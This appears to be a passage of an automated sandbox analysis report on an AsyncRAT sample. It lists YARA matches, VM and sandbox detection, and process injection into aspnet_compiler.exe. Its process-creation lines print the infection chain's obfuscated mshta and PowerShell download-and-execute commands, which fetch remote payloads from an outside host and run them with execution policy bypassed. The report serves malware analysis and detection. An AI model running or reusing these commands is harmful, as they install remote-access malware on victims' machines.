                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion:

                  Yara detected AsyncRAT
                  Source: Yara match | File source: 00000009.00000002.901879167.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.913434202.000000000B780000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000003.745955068.0000000005B56000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.762757327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 1296, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5764, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 3544, type: MEMORY
                  Source: Yara match | File source: 5.3.powershell.exe.5bcd1ec.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.powershell.exe.b670778.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.powershell.exe.b6827bc.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.3.powershell.exe.5bcd1ec.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.3.powershell.exe.5bbb094.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.powershell.exe.b6827bc.6.unpack, type: UNPACKEDPE
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: powershell.exe, 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.901879167.0000000000402000.00000040.00000001.sdmp, aspnet_compiler.exe, 0000000A.00000002.762757327.0000000000402000.00000040.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
                  Source: C:\Windows\SysWOW64\mshta.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2850
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6118
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4373
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4122
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4103
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Window / User API: threadDelayed 1349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Window / User API: threadDelayed 8390
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5964 | Thread sleep time: -9223372036854770s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3840 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2896 | Thread sleep count: 4103 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2896 | Thread sleep count: 4210 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2860 | Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2860 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5836 | Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5520 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5520 | Thread sleep count: 75 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5820 | Thread sleep count: 1349 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5820 | Thread sleep count: 8390 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 1052 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | File Volume queried: C:\ FullSizeInformation
                  Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                  Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
                  Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                  Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Users\user\AppData\
                  Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Users\user\
                  Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                  Source: powershell.exe, 00000002.00000002.917575089.000001DEBE700000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.907473311.00000000057E0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                  Source: mshta.exe, 00000004.00000002.695471290.0000000002CDA000.00000004.00000001.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
                  Source: aspnet_compiler.exe, 0000000A.00000002.762757327.0000000000402000.00000040.00000001.sdmp | Binary or memory string: vmware
                  Source: mshta.exe, 00000001.00000002.651499116.000002454F73A000.00000004.00000020.sdmp, aspnet_compiler.exe, 00000009.00000003.721978245.000000000515F000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
                  Source: mshta.exe, 00000001.00000002.651380882.000002454F69B000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWPRnOE
                  Source: aspnet_compiler.exe, 00000009.00000003.721978245.000000000515F000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWI
                  Source: powershell.exe, 00000002.00000002.917575089.000001DEBE700000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.907473311.00000000057E0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                  Source: powershell.exe, 00000002.00000002.917575089.000001DEBE700000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.907473311.00000000057E0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                  Source: mshta.exe, 00000001.00000002.651407334.000002454F6CE000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW?
                  Source: powershell.exe, 00000002.00000002.917430710.000001DEBE29D000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: powershell.exe, 00000002.00000002.917575089.000001DEBE700000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.907473311.00000000057E0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Process token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  Injects a PE file into a foreign processes
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
                  Writes to foreign memory regions
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 40E000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 410000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 109E008
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 40E000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 410000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: BDE008
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' http://ahmedadel.work/cairo/Encoding.txt
                  Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1
                  Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\Microsoft.ps1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe #cmd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe #cmd
                  Source: powershell.exe, 00000002.00000002.904283320.000001DEA4720000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.904230619.00000000037D0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.904094323.000002AA65660000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.904174668.00000000015B0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
                  Source: powershell.exe, 00000002.00000002.904283320.000001DEA4720000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.904230619.00000000037D0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.904094323.000002AA65660000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.904174668.00000000015B0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                  Source: powershell.exe, 00000002.00000002.904283320.000001DEA4720000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.904230619.00000000037D0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.904094323.000002AA65660000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.904174668.00000000015B0000.00000002.00000001.sdmp | Binary or memory string: Progman
                  Source: powershell.exe, 00000002.00000002.904283320.000001DEA4720000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.904230619.00000000037D0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.904094323.000002AA65660000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.904174668.00000000015B0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected AsyncRAT
Source: Yara match | File source: 00000009.00000002.901879167.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.913434202.000000000B780000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.745955068.0000000005B56000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.762757327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 1296, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5764, type: MEMORY
Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 3544, type: MEMORY
